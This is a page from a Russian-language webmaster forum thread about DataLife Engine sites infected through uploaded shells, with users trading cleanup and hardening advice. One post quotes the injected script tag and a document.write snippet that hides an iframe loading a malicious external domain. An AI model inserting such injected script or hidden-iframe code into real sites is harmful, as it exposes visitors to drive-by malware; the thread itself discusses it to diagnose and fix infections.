Скрытая реклама-вирус на DLE

12
Rebz
На сайте с 27.01.2009
Offline
58
#11
Хортица:
Rebz, посмотрите аналогичные темы на форуме, я думаю Вам станет понятно что Вы очень сильно ошибаетесь!

Да вот смотрел. Один модуль "Переходы" чего стоит :)

PS Естественно я говорю про лицензионную версию, а не NULLED, где без бекдоров и прочих пасхальных яиц вряд ли обходится.

rebz.net - Профессиональный аудит безопасности сайтов (http://rebz.net) (ОТЗЫВЫ (http://forum.antichat.net/threadnav153966-1-10.html)) Мы надежно защитим Ваш бизнес в интернете.
RM
На сайте с 21.06.2011
Offline
77
#12

Могу помочь вылечить ваш сайт, за небольшую плату. Обращайтесь в ЛС.

Bаbai
На сайте с 17.05.2011
Offline
46
#13
Хортица:
И до сих пор не знаете что он дырявый и с большой долей вероятности на хостинге теперь живет шел ?

А по теме - ТС надо закрть уязвимости + почистить от шелов + почистить базу от js и iframe - гугл или webmoney вам помогут.

Знаю... Все это знают.

GL
На сайте с 20.05.2009
Offline
56
#14

Заранее прошу прощения за то что влезаю со своей проблемой, но может кто нибудь уже сталкивался с данной проблемой:

Сайт перекасило, шрифт изменился а в хроме выдается такое сообщение :

сайт ****** содержит материалы сайта hghgfghgf.bitcrew.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.

Сайт тоже на DLE

Стабильно работал на протяжении нескольких лет, без взяких модулей,хаков

Хортица
На сайте с 22.12.2006
Offline
289
#15
GeLeru:
Стабильно работал на протяжении нескольких лет, без взяких модулей,хаков

Опять же, ставьте заплатки, ищите шел и проверяйте базу.

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
GL
На сайте с 20.05.2009
Offline
56
#16

Повырезал левые коды из php файлов DLE, все заработало

dimcaster
На сайте с 23.12.2009
Offline
48
#17

Заказал ремонт, вот в чем была причина:

Значит, как все было: исполнительный файл, под названием fr1992.php загрузили в виде аватара на сервер

(в директорию \uploads\fotos\), выполнили, тем самым собрав информацию о сайте и добавив вирусный код.

Сам код заключается в подключении скрипта (javascript) стороннего сайта, где размещен фрейм (iframe).

Данный скрипт подключается в начале вывода всех страниц сайта.

Вот он:

<script src="http://epic-win.dyndns.org/host.php?id=159"></script><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01

Transitional//EN">

Как видим подключается сторонний java-script по адресу http://epic-win.dyndns.org/host.php?id=159

В данном файле код, написанный на javascript, который выводит на экран фрейм(ширина 10, высота 49 пиксилей),

но этот фрейм не видно так как он позиционирован сверху, над всей страницей:

document.write(’<div style="position: absolute;left: 0;bottom: 100%;">

<iframe src="http://epic-win.dyndns.org/forum.php" width="10" height="49"></iframe></div>’);

Убедиться в том, что там есть вирус можно через Яндекс или Антивирус Касперского.

Вирус был файле в \language\Russian\website.lng

Он был в очень страшной форме зашифрован и жутко спрятан.

Для предотвращения подобного, нужно убрать права на выполнение скриптов во всех папках uploads, оставить только на запись и чтение, выполнение - губит (744 выставить).

S8
На сайте с 27.08.2010
Offline
66
#18
GeLeru:
Заранее прошу прощения за то что влезаю со своей проблемой, но может кто нибудь уже сталкивался с данной проблемой:

Сайт перекасило, шрифт изменился а в хроме выдается такое сообщение :
сайт ****** содержит материалы сайта hghgfghgf.bitcrew.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.

Сайт тоже на DLE
Стабильно работал на протяжении нескольких лет, без взяких модулей,хаков

у меня тоже самое.Фигурирует тоже сайт hghgfghgf.bitcrew.ru.Заражены все стр. сайта.

Касперский вот что выдает.Скачал сайт, проверил касперским на компе, нашел вирус в файлах шаблона:логин.тпл и маин.тпл.Удалил, залил на сайт.Опять тоже самое.Перерыл поиском все, кода нигде нет.А вирус есть.Заменил шаблон на тот которий идет по умолчанию - default.И вирус тут как тут.Как?DLE 8.3 дирявый Nulled

Запрашиваемый URL-адрес не может быть предоставлен

В запрашиваемом объекте по URL-адресу:

http://fvb.lviv.ua/

Обнаружена угроза:

объект заражен Trojan-Downloader.JS.Iframe.cob
WebAlt
На сайте с 02.12.2007
Offline
266
#19
dimcaster:

Для предотвращения подобного, нужно убрать права на выполнение скриптов во всех папках uploads, оставить только на запись и чтение, выполнение - губит (744 выставить).

Для предотвращения подобного не мешало бы иногда читать официальные сайты движков, которые вы ставите:

Защита папок скрипта от запуска сторонних скриптов

Хортица
На сайте с 22.12.2006
Offline
289
#20

WebAlt, обошли уже и это:

Хортица:
Сегодня обнаружилась еще одна уязвимость в ДЛЕ, сайты разных версий 8.0, 8.3, 9.2, 9.4. Все известные заплатки были установлены. Свой сервер. От "соседей" проникнуть не могли. Стоит контроль доступа к файлам, проверка на наличие в файлах функций шела и прочие примочки безопасности. Все это дело обошли.
В логах уже нашел как и что делали через шелы. Но как залили эти шелы пока не нашел. Логов почти на 1,5 Гб...
Так что будьте бдительны, ДЛЕ шлет пламенный привет безопасности в очередной раз!
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий